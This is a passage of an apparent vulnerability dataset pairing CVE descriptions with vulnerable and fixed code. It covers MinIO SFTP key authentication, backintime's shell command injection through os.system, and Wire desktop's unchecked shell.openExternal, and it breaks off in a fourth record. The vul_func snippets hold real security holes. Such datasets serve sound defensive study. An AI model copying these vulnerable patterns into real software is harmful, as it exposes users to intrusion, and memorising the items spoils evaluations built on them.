new(sftpLogger),\n\t\tSSHConfig: sshConfig,\n\t\tHandleSFTPSession: handleSFTPSession,\n\t})\n\tif err != nil {\n\t\tlogger.Fatal(err, \"Unable to start SFTP Server\")\n\t}\n\n\terr = sftpServer.Listen()\n\tif err != nil {\n\t\tlogger.Fatal(err, \"SFTP Server had an unrecoverable error while accepting connections\")\n\t}\n}"}], "fix_func": [{"id": "fix_go_239_1", "commit": "4c71f1b4ec0fb2a473ddaac18c20ec9e63f267ec", "file_path": "cmd/sftp-server.go", "start_line": 65, "end_line": 65, "snippet": "var globalSFTPTrustedCAPubkey ssh.PublicKey"}, {"id": "fix_go_239_2", "commit": "4c71f1b4ec0fb2a473ddaac18c20ec9e63f267ec", "file_path": "cmd/sftp-server.go", "start_line": 137, "end_line": 191, "snippet": "func authenticateSSHConnection(c ssh.ConnMetadata, key ssh.PublicKey, pass []byte) (*ssh.Permissions, error) {\n\tuser, found := strings.CutSuffix(c.User(), \"=ldap\")\n\tif found {\n\t\tif !globalIAMSys.LDAPConfig.Enabled() {\n\t\t\treturn nil, errSFTPLDAPNotEnabled\n\t\t}\n\t\treturn processLDAPAuthentication(key, pass, user)\n\t}\n\n\tuser, found = strings.CutSuffix(c.User(), \"=svc\")\n\tif found {\n\t\tgoto internalAuth\n\t}\n\n\tif globalIAMSys.LDAPConfig.Enabled() {\n\t\tperms, _ := processLDAPAuthentication(key, pass, user)\n\t\tif perms != nil {\n\t\t\treturn perms, nil\n\t\t}\n\t}\n\ninternalAuth:\n\tui, ok := globalIAMSys.GetUser(context.Background(), user)\n\tif !ok {\n\t\treturn nil, errNoSuchUser\n\t}\n\n\tif globalSFTPTrustedCAPubkey != nil && pass == nil {\n\t\terr := validateClientKeyIsTrusted(c, key)\n\t\tif err != nil {\n\t\t\treturn nil, errAuthentication\n\t\t}\n\t} else {\n\t\t// Temporary credentials are not allowed.\n\t\tif ui.Credentials.IsTemp() {\n\t\t\treturn nil, errAuthentication\n\t\t}\n\t\tif subtle.ConstantTimeCompare([]byte(ui.Credentials.SecretKey), pass) != 1 {\n\t\t\treturn nil, errAuthentication\n\t\t}\n\t}\n\n\tcopts := map[string]string{\n\t\t\"AccessKey\": ui.Credentials.AccessKey,\n\t\t\"SecretKey\": ui.Credentials.SecretKey,\n\t}\n\tif ui.Credentials.IsTemp() {\n\t\tcopts[\"SessionToken\"] = ui.Credentials.SessionToken\n\t}\n\n\treturn &ssh.Permissions{\n\t\tCriticalOptions: copts,\n\t\tExtensions: make(map[string]string),\n\t}, nil\n}"}, {"id": "fix_go_239_3", "commit": "4c71f1b4ec0fb2a473ddaac18c20ec9e63f267ec", "file_path": "cmd/sftp-server.go", "start_line": 193, "end_line": 320, "snippet": "func processLDAPAuthentication(key ssh.PublicKey, pass []byte, user string) (perms *ssh.Permissions, err error) {\n\tvar lookupResult *xldap.DNSearchResult\n\tvar targetGroups []string\n\n\tif pass == nil && key == nil 
{\n\t\treturn nil, errAuthentication\n\t}\n\n\tif pass != nil {\n\t\tsa, _, err := globalIAMSys.getServiceAccount(context.Background(), user)\n\t\tif err == nil {\n\t\t\tif subtle.ConstantTimeCompare([]byte(sa.Credentials.SecretKey), pass) != 1 {\n\t\t\t\treturn nil, errAuthentication\n\t\t\t}\n\n\t\t\treturn &ssh.Permissions{\n\t\t\t\tCriticalOptions: map[string]string{\n\t\t\t\t\t\"AccessKey\": sa.Credentials.AccessKey,\n\t\t\t\t\t\"SecretKey\": sa.Credentials.SecretKey,\n\t\t\t\t},\n\t\t\t\tExtensions: make(map[string]string),\n\t\t\t}, nil\n\t\t}\n\n\t\tif !errors.Is(err, errNoSuchServiceAccount) {\n\t\t\treturn nil, err\n\t\t}\n\n\t\tlookupResult, targetGroups, err = globalIAMSys.LDAPConfig.Bind(user, string(pass))\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t} else if key != nil {\n\t\tlookupResult, targetGroups, err = globalIAMSys.LDAPConfig.LookupUserDN(user)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\n\tif lookupResult == nil {\n\t\treturn nil, errNoSuchUser\n\t}\n\n\tldapPolicies, _ := globalIAMSys.PolicyDBGet(lookupResult.NormDN, targetGroups...)\n\tif len(ldapPolicies) == 0 {\n\t\treturn nil, errSFTPUserHasNoPolicies\n\t}\n\n\tclaims := make(map[string]interface{})\n\tfor attribKey, attribValue := range lookupResult.Attributes {\n\t\t// we skip multi-value attributes here, as they cannot\n\t\t// be stored in the critical options.\n\t\tif len(attribValue) != 1 {\n\t\t\tcontinue\n\t\t}\n\n\t\tif attribKey == \"sshPublicKey\" && key != nil {\n\t\t\tkey2, _, _, _, err := ssh.ParseAuthorizedKey([]byte(attribValue[0]))\n\t\t\tif err != nil {\n\t\t\t\treturn nil, errSFTPPublicKeyBadFormat\n\t\t\t}\n\n\t\t\tif subtle.ConstantTimeCompare(key2.Marshal(), key.Marshal()) != 1 {\n\t\t\t\treturn nil, errAuthentication\n\t\t\t}\n\t\t}\n\t\t// Save each attribute to claims.\n\t\tclaims[ldapAttribPrefix+attribKey] = attribValue[0]\n\t}\n\n\tif key != nil {\n\t\t// If a key was provided, we expect the user to have an sshPublicKey\n\t\t// attribute.\n\t\tif _, ok := claims[ldapAttribPrefix+\"sshPublicKey\"]; !ok {\n\t\t\treturn nil, errAuthentication\n\t\t}\n\t}\n\n\texpiryDur, err := globalIAMSys.LDAPConfig.GetExpiryDuration(\"\")\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tclaims[expClaim] = UTCNow().Add(expiryDur).Unix()\n\tclaims[ldapUserN] = user\n\tclaims[ldapUser] = lookupResult.NormDN\n\n\tcred, err := auth.GetNewCredentialsWithMetadata(claims, globalActiveCred.SecretKey)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// Set the parent of the temporary access key, this is useful\n\t// in obtaining service accounts by this cred.\n\tcred.ParentUser = lookupResult.NormDN\n\n\t// Set this value to LDAP groups, LDAP user can be part\n\t// of large number of groups\n\tcred.Groups = targetGroups\n\n\t// Set the newly generated credentials, policyName is empty on purpose\n\t// LDAP policies are applied automatically using their ldapUser, ldapGroups\n\t// mapping.\n\tupdatedAt, err := globalIAMSys.SetTempUser(context.Background(), cred.AccessKey, cred, \"\")\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treplLogIf(context.Background(), globalSiteReplicationSys.IAMChangeHook(context.Background(), madmin.SRIAMItem{\n\t\tType: madmin.SRIAMItemSTSAcc,\n\t\tSTSCredential: &madmin.SRSTSCredential{\n\t\t\tAccessKey: cred.AccessKey,\n\t\t\tSecretKey: cred.SecretKey,\n\t\t\tSessionToken: cred.SessionToken,\n\t\t\tParentUser: cred.ParentUser,\n\t\t},\n\t\tUpdatedAt: updatedAt,\n\t}))\n\n\treturn &ssh.Permissions{\n\t\tCriticalOptions: 
map[string]string{\n\t\t\t\"AccessKey\": cred.AccessKey,\n\t\t\t\"SecretKey\": cred.SecretKey,\n\t\t\t\"SessionToken\": cred.SessionToken,\n\t\t},\n\t\tExtensions: make(map[string]string),\n\t}, nil\n}"}, {"id": "fix_go_239_4", "commit": "4c71f1b4ec0fb2a473ddaac18c20ec9e63f267ec", "file_path": "cmd/sftp-server.go", "start_line": 322, "end_line": 348, "snippet": "func validateClientKeyIsTrusted(c ssh.ConnMetadata, clientKey ssh.PublicKey) (err error) {\n\tif globalSFTPTrustedCAPubkey == nil {\n\t\treturn errors.New(\"public key authority validation requested but no ca public key specified.\")\n\t}\n\n\tcert, ok := clientKey.(*ssh.Certificate)\n\tif !ok {\n\t\treturn errSftpPublicKeyWithoutCert\n\t}\n\n\t// ssh.CheckCert called by ssh.Authenticate accepts certificates\n\t// with empty principles list so we block those in here.\n\tif len(cert.ValidPrincipals) == 0 {\n\t\treturn errSftpCertWithoutPrincipals\n\t}\n\n\t// Verify that certificate provided by user is issued by trusted CA,\n\t// username in authentication request matches to identities in certificate\n\t// and that certificate type is correct.\n\tchecker := ssh.CertChecker{}\n\tchecker.IsUserAuthority = func(k ssh.PublicKey) bool {\n\t\treturn subtle.ConstantTimeCompare(globalSFTPTrustedCAPubkey.Marshal(), k.Marshal()) == 1\n\t}\n\n\t_, err = checker.Authenticate(c, clientKey)\n\treturn\n}"}, {"id": "fix_go_239_5", "commit": "4c71f1b4ec0fb2a473ddaac18c20ec9e63f267ec", "file_path": "cmd/sftp-server.go", "start_line": 394, "end_line": 523, "snippet": "func startSFTPServer(args []string) {\n\tvar (\n\t\tport int\n\t\tpublicIP string\n\t\tsshPrivateKey string\n\t\tuserCaKeyFile string\n\t\tdisablePassAuth bool\n\t)\n\n\tallowPubKeys := supportedPubKeyAuthAlgos\n\tallowKexAlgos := preferredKexAlgos\n\tallowCiphers := preferredCiphers\n\tallowMACs := supportedMACs\n\tvar err error\n\n\tfor _, arg := range args {\n\t\ttokens := strings.SplitN(arg, \"=\", 2)\n\t\tif len(tokens) != 2 {\n\t\t\tlogger.Fatal(fmt.Errorf(\"invalid arguments passed to --sftp=%s\", arg), \"unable to start SFTP server\")\n\t\t}\n\t\tswitch tokens[0] {\n\t\tcase \"address\":\n\t\t\thost, portStr, err := net.SplitHostPort(tokens[1])\n\t\t\tif err != nil {\n\t\t\t\tlogger.Fatal(fmt.Errorf(\"invalid arguments passed to --sftp=%s (%v)\", arg, err), \"unable to start SFTP server\")\n\t\t\t}\n\t\t\tport, err = strconv.Atoi(portStr)\n\t\t\tif err != nil {\n\t\t\t\tlogger.Fatal(fmt.Errorf(\"invalid arguments passed to --sftp=%s (%v)\", arg, err), \"unable to start SFTP server\")\n\t\t\t}\n\t\t\tif port < 1 || port > 65535 {\n\t\t\t\tlogger.Fatal(fmt.Errorf(\"invalid arguments passed to --sftp=%s, (port number must be between 1 to 65535)\", arg), \"unable to start SFTP server\")\n\t\t\t}\n\t\t\tpublicIP = host\n\t\tcase \"ssh-private-key\":\n\t\t\tsshPrivateKey = tokens[1]\n\t\tcase \"pub-key-algos\":\n\t\t\tallowPubKeys = filterAlgos(arg, strings.Split(tokens[1], \",\"), supportedPubKeyAuthAlgos)\n\t\tcase \"kex-algos\":\n\t\t\tallowKexAlgos = filterAlgos(arg, strings.Split(tokens[1], \",\"), supportedKexAlgos)\n\t\tcase \"cipher-algos\":\n\t\t\tallowCiphers = filterAlgos(arg, strings.Split(tokens[1], \",\"), supportedCiphers)\n\t\tcase \"mac-algos\":\n\t\t\tallowMACs = filterAlgos(arg, strings.Split(tokens[1], \",\"), supportedMACs)\n\t\tcase \"trusted-user-ca-key\":\n\t\t\tuserCaKeyFile = tokens[1]\n\t\tcase \"disable-password-auth\":\n\t\t\tdisablePassAuth, _ = strconv.ParseBool(tokens[1])\n\t\t}\n\t}\n\n\tif port == 0 {\n\t\tport = 8022 // Default SFTP port, since no 
port was given.\n\t}\n\n\tif sshPrivateKey == \"\" {\n\t\tlogger.Fatal(fmt.Errorf(\"invalid arguments passed, private key file is mandatory for --sftp='ssh-private-key=path/to/id_ecdsa'\"), \"unable to start SFTP server\")\n\t}\n\n\tprivateBytes, err := os.ReadFile(sshPrivateKey)\n\tif err != nil {\n\t\tlogger.Fatal(fmt.Errorf(\"invalid arguments passed, private key file is not accessible: %v\", err), \"unable to start SFTP server\")\n\t}\n\n\tprivate, err := ssh.ParsePrivateKey(privateBytes)\n\tif err != nil {\n\t\tlogger.Fatal(fmt.Errorf(\"invalid arguments passed, private key file is not parseable: %v\", err), \"unable to start SFTP server\")\n\t}\n\n\tif userCaKeyFile != \"\" {\n\t\tkeyBytes, err := os.ReadFile(userCaKeyFile)\n\t\tif err != nil {\n\t\t\tlogger.Fatal(fmt.Errorf(\"invalid arguments passed, trusted user certificate authority public key file is not accessible: %v\", err), \"unable to start SFTP server\")\n\t\t}\n\n\t\tglobalSFTPTrustedCAPubkey, _, _, _, err = ssh.ParseAuthorizedKey(keyBytes)\n\t\tif err != nil {\n\t\t\tlogger.Fatal(fmt.Errorf(\"invalid arguments passed, trusted user certificate authority public key file is not parseable: %v\", err), \"unable to start SFTP server\")\n\t\t}\n\t}\n\n\t// An SSH server is represented by a ServerConfig, which holds\n\t// certificate details and handles authentication of ServerConns.\n\tsshConfig := &ssh.ServerConfig{\n\t\tConfig: ssh.Config{\n\t\t\tKeyExchanges: allowKexAlgos,\n\t\t\tCiphers: allowCiphers,\n\t\t\tMACs: allowMACs,\n\t\t},\n\t\tPublicKeyAuthAlgorithms: allowPubKeys,\n\t\tPublicKeyCallback: sshPubKeyAuth,\n\t}\n\n\tif !disablePassAuth {\n\t\tsshConfig.PasswordCallback = sshPasswordAuth\n\t} else {\n\t\tsshConfig.PasswordCallback = nil\n\t}\n\n\tsshConfig.AddHostKey(private)\n\n\thandleSFTPSession := func(channel ssh.Channel, sconn *ssh.ServerConn) {\n\t\tvar remoteIP string\n\n\t\tif host, _, err := net.SplitHostPort(sconn.RemoteAddr().String()); err == nil {\n\t\t\tremoteIP = host\n\t\t}\n\t\tserver := sftp.NewRequestServer(channel, NewSFTPDriver(sconn.Permissions, remoteIP), sftp.WithRSAllocator())\n\t\tdefer server.Close()\n\t\tserver.Serve()\n\t}\n\n\tsftpServer, err := xsftp.NewServer(&xsftp.Options{\n\t\tPublicIP: publicIP,\n\t\tPort: port,\n\t\t// OpensSSH default handshake timeout is 2 minutes.\n\t\tSSHHandshakeDeadline: 2 * time.Minute,\n\t\tLogger: new(sftpLogger),\n\t\tSSHConfig: sshConfig,\n\t\tHandleSFTPSession: handleSFTPSession,\n\t})\n\tif err != nil {\n\t\tlogger.Fatal(err, \"Unable to start SFTP Server\")\n\t}\n\n\terr = sftpServer.Listen()\n\tif err != nil {\n\t\tlogger.Fatal(err, \"SFTP Server had an unrecoverable error while accepting connections\")\n\t}\n}"}], "vul_patch": "--- a/cmd/sftp-server.go\n+++ b/cmd/sftp-server.go\n@@ -1 +1 @@\n-var caPublicKey ssh.PublicKey\n+var globalSFTPTrustedCAPubkey ssh.PublicKey\n\n--- a/cmd/sftp-server.go\n+++ b/cmd/sftp-server.go\n@@ -25,8 +25,8 @@\n \t\treturn nil, errNoSuchUser\n \t}\n \n-\tif caPublicKey != nil && pass == nil {\n-\t\terr := validateKey(c, key)\n+\tif globalSFTPTrustedCAPubkey != nil && pass == nil {\n+\t\terr := validateClientKeyIsTrusted(c, key)\n \t\tif err != nil {\n \t\t\treturn nil, errAuthentication\n \t\t}\n\n--- a/cmd/sftp-server.go\n+++ b/cmd/sftp-server.go\n@@ -64,7 +64,16 @@\n \t\t\t\treturn nil, errAuthentication\n \t\t\t}\n \t\t}\n+\t\t// Save each attribute to claims.\n \t\tclaims[ldapAttribPrefix+attribKey] = attribValue[0]\n+\t}\n+\n+\tif key != nil {\n+\t\t// If a key was provided, we expect the user to have an 
sshPublicKey\n+\t\t// attribute.\n+\t\tif _, ok := claims[ldapAttribPrefix+\"sshPublicKey\"]; !ok {\n+\t\t\treturn nil, errAuthentication\n+\t\t}\n \t}\n \n \texpiryDur, err := globalIAMSys.LDAPConfig.GetExpiryDuration(\"\")\n\n--- a/cmd/sftp-server.go\n+++ b/cmd/sftp-server.go\n@@ -1,5 +1,5 @@\n-func validateKey(c ssh.ConnMetadata, clientKey ssh.PublicKey) (err error) {\n-\tif caPublicKey == nil {\n+func validateClientKeyIsTrusted(c ssh.ConnMetadata, clientKey ssh.PublicKey) (err error) {\n+\tif globalSFTPTrustedCAPubkey == nil {\n \t\treturn errors.New(\"public key authority validation requested but no ca public key specified.\")\n \t}\n \n@@ -19,7 +19,7 @@\n \t// and that certificate type is correct.\n \tchecker := ssh.CertChecker{}\n \tchecker.IsUserAuthority = func(k ssh.PublicKey) bool {\n-\t\treturn subtle.ConstantTimeCompare(caPublicKey.Marshal(), k.Marshal()) == 1\n+\t\treturn subtle.ConstantTimeCompare(globalSFTPTrustedCAPubkey.Marshal(), k.Marshal()) == 1\n \t}\n \n \t_, err = checker.Authenticate(c, clientKey)\n\n--- a/cmd/sftp-server.go\n+++ b/cmd/sftp-server.go\n@@ -44,7 +44,7 @@\n \t\t\tallowMACs = filterAlgos(arg, strings.Split(tokens[1], \",\"), supportedMACs)\n \t\tcase \"trusted-user-ca-key\":\n \t\t\tuserCaKeyFile = tokens[1]\n-\t\tcase \"password-auth\":\n+\t\tcase \"disable-password-auth\":\n \t\t\tdisablePassAuth, _ = strconv.ParseBool(tokens[1])\n \t\t}\n \t}\n@@ -73,7 +73,7 @@\n \t\t\tlogger.Fatal(fmt.Errorf(\"invalid arguments passed, trusted user certificate authority public key file is not accessible: %v\", err), \"unable to start SFTP server\")\n \t\t}\n \n-\t\tcaPublicKey, _, _, _, err = ssh.ParseAuthorizedKey(keyBytes)\n+\t\tglobalSFTPTrustedCAPubkey, _, _, _, err = ssh.ParseAuthorizedKey(keyBytes)\n \t\tif err != nil {\n \t\t\tlogger.Fatal(fmt.Errorf(\"invalid arguments passed, trusted user certificate authority public key file is not parseable: %v\", err), \"unable to start SFTP server\")\n \t\t}\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2017-16667", "cve_description": "backintime (aka Back in Time) before 1.1.24 did improper escaping/quoting of file paths used as arguments to the 'notify-send' command, leading to some parts of file paths being executed as shell commands within an os.system call in qt4/plugins/notifyplugin.py. 
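The patched `on_message` shown below stops building a shell string from untrusted file names and instead passes an argument vector, so quotes or backticks in a path are never re-parsed by a shell. A condensed Python illustration of that switch:

```python
import subprocess

def notify(title: str, message: str, timeout_ms: int = 0) -> None:
    # Vulnerable shape: os.system('notify-send "%s" "%s"' % (title, message))
    # lets shell metacharacters in a file name execute as commands.
    cmd = ["notify-send"]
    if timeout_ms > 0:
        cmd.extend(["-t", str(timeout_ms)])
    cmd.extend([title, message])
    # Each element reaches execve() verbatim; no shell is involved.
    subprocess.Popen(cmd).communicate()
```

Because `subprocess.Popen` with a list bypasses the shell entirely, no quoting or escaping of `title` and `message` is needed.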
This could allow an attacker to craft an unreadable file with a specific name to run arbitrary shell commands.", "cwe_info": {"CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/bit-team/backintime", "patch_url": ["https://github.com/bit-team/backintime/commit/cef81d0da93ff601252607df3db1a48f7f6f01b3"], "programing_language": "Python", "vul_func": [{"id": "vul_py_374_1", "commit": "c36d3682c40cf29713bee9a1a8735574d4e032e2", "file_path": "qt4/plugins/notifyplugin.py", "start_line": 65, "end_line": 78, "snippet": " def on_message( self, profile_id, profile_name, level, message, timeout ):\n if 1 == level:\n cmd = \"notify-send \"\n if timeout > 0:\n cmd = cmd + \" -t %s\" % (1000 * timeout)\n\n title = \"Back In Time (%s) : %s\" % (self.user, profile_name)\n message = message.replace(\"\\n\", ' ')\n message = message.replace(\"\\r\", '')\n\n cmd = cmd + \" \\\"%s\\\" \\\"%s\\\"\" % (title, message)\n print(cmd)\n os.system(cmd)\n return"}], "fix_func": [{"id": "fix_py_374_1", "commit": "cef81d0da93ff601252607df3db1a48f7f6f01b3", "file_path": "qt4/plugins/notifyplugin.py", "start_line": 66, "end_line": 79, "snippet": " def on_message( self, profile_id, profile_name, level, message, timeout ):\n if 1 == level:\n cmd = ['notify-send']\n if timeout > 0:\n cmd.extend(['-t', str(1000 * timeout)])\n\n title = \"Back In Time (%s) : %s\" % (self.user, profile_name)\n message = message.replace(\"\\n\", ' ')\n message = message.replace(\"\\r\", '')\n\n cmd.append(title)\n cmd.append(message)\n subprocess.Popen(cmd).communicate()\n return"}], "vul_patch": "--- a/qt4/plugins/notifyplugin.py\n+++ b/qt4/plugins/notifyplugin.py\n@@ -1,14 +1,14 @@\n def on_message( self, profile_id, profile_name, level, message, timeout ):\n if 1 == level:\n- cmd = \"notify-send \"\n+ cmd = ['notify-send']\n if timeout > 0:\n- cmd = cmd + \" -t %s\" % (1000 * timeout)\n+ cmd.extend(['-t', str(1000 * timeout)])\n \n title = \"Back In Time (%s) : %s\" % (self.user, profile_name)\n message = message.replace(\"\\n\", ' ')\n message = message.replace(\"\\r\", '')\n \n- cmd = cmd + \" \\\"%s\\\" \\\"%s\\\"\" % (title, message)\n- print(cmd)\n- os.system(cmd)\n+ cmd.append(title)\n+ cmd.append(message)\n+ subprocess.Popen(cmd).communicate()\n return\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2020-15258", "cve_description": "In Wire before 3.20.x, `shell.openExternal` was used without checking the URL. This vulnerability allows an attacker to execute code on the victims machine by sending messages containing links with arbitrary protocols. The victim has to interact with the link and sees the URL that is opened. The issue was patched by implementing a helper function which checks if the URL's protocol is common. If it is common, the URL will be opened externally. If not, the URL will not be opened and a warning appears for the user informing them that a probably insecure URL was blocked from being executed. The issue is patched in Wire 3.20.x. 
More technical details about exploitation are available in the linked advisory.", "cwe_info": {"CWE-20": {"name": "Improper Input Validation", "description": "The product receives input or data, but it does\n not validate or incorrectly validates that the input has the\n properties that are required to process the data safely and\n correctly."}}, "repo": "https://github.com/wireapp/wire-desktop", "patch_url": ["https://github.com/wireapp/wire-desktop/commit/b3705fffa75a03f055530f55a754face5ac0623b"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_192_1", "commit": "86f7820", "file_path": "electron/src/window/AboutWindow.ts", "start_line": 87, "end_line": 100, "snippet": " aboutWindow.webContents.session.webRequest.onBeforeRequest(async ({url}, callback) => {\n // Only allow those URLs to be opened within the window\n if (ABOUT_WINDOW_ALLOWLIST.includes(url)) {\n return callback({cancel: false});\n }\n\n // Open HTTPS links in browser instead\n if (url.startsWith('https://')) {\n await shell.openExternal(url);\n } else {\n logger.info(`Attempt to open URL \"${url}\" in window prevented.`);\n callback({redirectURL: ABOUT_HTML});\n }\n });"}, {"id": "vul_js_192_2", "commit": "86f7820", "file_path": "electron/src/main.ts", "start_line": 258, "end_line": 268, "snippet": " main.webContents.on('new-window', async (event, url) => {\n event.preventDefault();\n\n // Ensure the link does not come from a webview\n if (typeof (event as any).sender.viewInstanceId !== 'undefined') {\n logger.log('New window was created from a webview, aborting.');\n return;\n }\n\n await shell.openExternal(url);\n });"}, {"id": "vul_js_192_3", "commit": "86f7820", "file_path": "electron/src/main.ts", "start_line": 495, "end_line": 511, "snippet": " webviewProtection(): void {\n const openLinkInNewWindow = (\n event: ElectronEvent,\n url: string,\n frameName: string,\n _disposition: string,\n options: BrowserWindowConstructorOptions,\n ): Promise => {\n event.preventDefault();\n\n if (SingleSignOn.isSingleSignOnLoginWindow(frameName)) {\n return new SingleSignOn(main, event, url, options).init();\n }\n\n this.logger.log('Opening an external window from a webview.');\n return shell.openExternal(url);\n };"}, {"id": "vul_js_192_4", "commit": "86f7820", "file_path": "electron/src/menu/system.ts", "start_line": 249, "end_line": 275, "snippet": "const helpTemplate: MenuItemConstructorOptions = {\n label: `&${locale.getText('menuHelp')}`,\n role: 'help',\n submenu: [\n {\n click: () => shell.openExternal(config.legalUrl),\n label: locale.getText('menuLegal'),\n },\n {\n click: () => shell.openExternal(config.privacyUrl),\n label: locale.getText('menuPrivacy'),\n },\n {\n click: () => shell.openExternal(config.licensesUrl),\n label: locale.getText('menuLicense'),\n },\n {\n click: () => shell.openExternal(config.supportUrl),\n label: locale.getText('menuSupport'),\n },\n {\n click: () => shell.openExternal(EnvironmentUtil.web.getWebsiteUrl()),\n label: locale.getText('menuAppURL'),\n },\n downloadLogsTemplate,\n ],\n};"}], "fix_func": [{"id": "fix_js_192_1", "commit": "b3705ff", "file_path": "electron/src/window/AboutWindow.ts", "start_line": 88, "end_line": 106, "snippet": " aboutWindow.webContents.session.webRequest.onBeforeRequest(async ({url}, callback) => {\n // Only allow those URLs to be opened within the window\n if (ABOUT_WINDOW_ALLOWLIST.includes(url)) {\n return callback({cancel: false});\n }\n });\n\n // Handle the new window event in the About Window\n aboutWindow.webContents.on('new-window', 
(event, url) => {\n event.preventDefault();\n\n // Ensure the link does not come from a webview\n if (typeof (event as any).sender.viewInstanceId !== 'undefined') {\n logger.log('New window was created from a webview, aborting.');\n return;\n }\n\n return WindowUtil.openExternal(url, true);\n });"}, {"id": "fix_js_192_2", "commit": "b3705ff", "file_path": "electron/src/main.ts", "start_line": 257, "end_line": 264, "snippet": " main.webContents.on('new-window', async (event, url) => {\n event.preventDefault();\n\n // Ensure the link does not come from a webview\n if (typeof (event as any).sender.viewInstanceId !== 'undefined') {\n logger.log('New window was created from a webview, aborting.');\n return;\n }"}, {"id": "fix_js_192_3", "commit": "b3705ff", "file_path": "electron/src/main.ts", "start_line": 494, "end_line": 510, "snippet": " webviewProtection(): void {\n const openLinkInNewWindow = (\n event: ElectronEvent,\n url: string,\n frameName: string,\n _disposition: string,\n options: BrowserWindowConstructorOptions,\n ): Promise => {\n event.preventDefault();\n\n if (SingleSignOn.isSingleSignOnLoginWindow(frameName)) {\n return new SingleSignOn(main, event, url, options).init();\n }\n\n this.logger.log('Opening an external window from a webview.');\n return WindowUtil.openExternal(url);\n };"}, {"id": "fix_js_192_4", "commit": "b3705ff", "file_path": "electron/src/menu/system.ts", "start_line": 250, "end_line": 276, "snippet": "const helpTemplate: MenuItemConstructorOptions = {\n label: `&${locale.getText('menuHelp')}`,\n role: 'help',\n submenu: [\n {\n click: () => WindowUtil.openExternal(config.legalUrl, true),\n label: locale.getText('menuLegal'),\n },\n {\n click: () => WindowUtil.openExternal(config.privacyUrl, true),\n label: locale.getText('menuPrivacy'),\n },\n {\n click: () => WindowUtil.openExternal(config.licensesUrl, true),\n label: locale.getText('menuLicense'),\n },\n {\n click: () => WindowUtil.openExternal(config.supportUrl, true),\n label: locale.getText('menuSupport'),\n },\n {\n click: () => WindowUtil.openExternal(EnvironmentUtil.web.getWebsiteUrl(), true),\n label: locale.getText('menuAppURL'),\n },\n downloadLogsTemplate,\n ],\n};"}, {"id": "fix_js_192_5", "commit": "b3705ff", "file_path": "electron/src/window/WindowUtil.ts", "start_line": 57, "end_line": 76, "snippet": "export const openExternal = async (url: string, httpsOnly: boolean = false): Promise => {\n try {\n const urlProtocol = URL.parse(url).protocol || '';\n const allowedProtocols = ['https:'];\n\n if (!httpsOnly) {\n allowedProtocols.push('ftp:', 'http:', 'mailto:');\n }\n\n if (!allowedProtocols.includes(urlProtocol)) {\n logger.warn(`Prevented opening external URL \"${url}\".`);\n showWarningDialog(`Prevented opening external URL \"${url}\".`);\n return;\n }\n\n await shell.openExternal(url);\n } catch (error) {\n logger.error(error);\n }\n};"}], "vul_patch": "--- a/electron/src/window/AboutWindow.ts\n+++ b/electron/src/window/AboutWindow.ts\n@@ -3,12 +3,17 @@\n if (ABOUT_WINDOW_ALLOWLIST.includes(url)) {\n return callback({cancel: false});\n }\n+ });\n \n- // Open HTTPS links in browser instead\n- if (url.startsWith('https://')) {\n- await shell.openExternal(url);\n- } else {\n- logger.info(`Attempt to open URL \"${url}\" in window prevented.`);\n- callback({redirectURL: ABOUT_HTML});\n+ // Handle the new window event in the About Window\n+ aboutWindow.webContents.on('new-window', (event, url) => {\n+ event.preventDefault();\n+\n+ // Ensure the link does not come from a webview\n+ if (typeof 
(event as any).sender.viewInstanceId !== 'undefined') {\n+ logger.log('New window was created from a webview, aborting.');\n+ return;\n }\n+\n+ return WindowUtil.openExternal(url, true);\n });\n\n--- a/electron/src/main.ts\n+++ b/electron/src/main.ts\n@@ -6,6 +6,3 @@\n logger.log('New window was created from a webview, aborting.');\n return;\n }\n-\n- await shell.openExternal(url);\n- });\n\n--- a/electron/src/main.ts\n+++ b/electron/src/main.ts\n@@ -13,5 +13,5 @@\n }\n \n this.logger.log('Opening an external window from a webview.');\n- return shell.openExternal(url);\n+ return WindowUtil.openExternal(url);\n };\n\n--- a/electron/src/menu/system.ts\n+++ b/electron/src/menu/system.ts\n@@ -3,23 +3,23 @@\n role: 'help',\n submenu: [\n {\n- click: () => shell.openExternal(config.legalUrl),\n+ click: () => WindowUtil.openExternal(config.legalUrl, true),\n label: locale.getText('menuLegal'),\n },\n {\n- click: () => shell.openExternal(config.privacyUrl),\n+ click: () => WindowUtil.openExternal(config.privacyUrl, true),\n label: locale.getText('menuPrivacy'),\n },\n {\n- click: () => shell.openExternal(config.licensesUrl),\n+ click: () => WindowUtil.openExternal(config.licensesUrl, true),\n label: locale.getText('menuLicense'),\n },\n {\n- click: () => shell.openExternal(config.supportUrl),\n+ click: () => WindowUtil.openExternal(config.supportUrl, true),\n label: locale.getText('menuSupport'),\n },\n {\n- click: () => shell.openExternal(EnvironmentUtil.web.getWebsiteUrl()),\n+ click: () => WindowUtil.openExternal(EnvironmentUtil.web.getWebsiteUrl(), true),\n label: locale.getText('menuAppURL'),\n },\n downloadLogsTemplate,\n\n--- /dev/null\n+++ b/electron/src/window/WindowUtil.ts\n@@ -0,0 +1,20 @@\n+export const openExternal = async (url: string, httpsOnly: boolean = false): Promise => {\n+ try {\n+ const urlProtocol = URL.parse(url).protocol || '';\n+ const allowedProtocols = ['https:'];\n+\n+ if (!httpsOnly) {\n+ allowedProtocols.push('ftp:', 'http:', 'mailto:');\n+ }\n+\n+ if (!allowedProtocols.includes(urlProtocol)) {\n+ logger.warn(`Prevented opening external URL \"${url}\".`);\n+ showWarningDialog(`Prevented opening external URL \"${url}\".`);\n+ return;\n+ }\n+\n+ await shell.openExternal(url);\n+ } catch (error) {\n+ logger.error(error);\n+ }\n+};\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2019-10141", "cve_description": "A vulnerability was found in openstack-ironic-inspector all versions excluding 5.0.2, 6.0.3, 7.2.4, 8.0.3 and 8.2.1. A SQL-injection vulnerability was found in openstack-ironic-inspector's 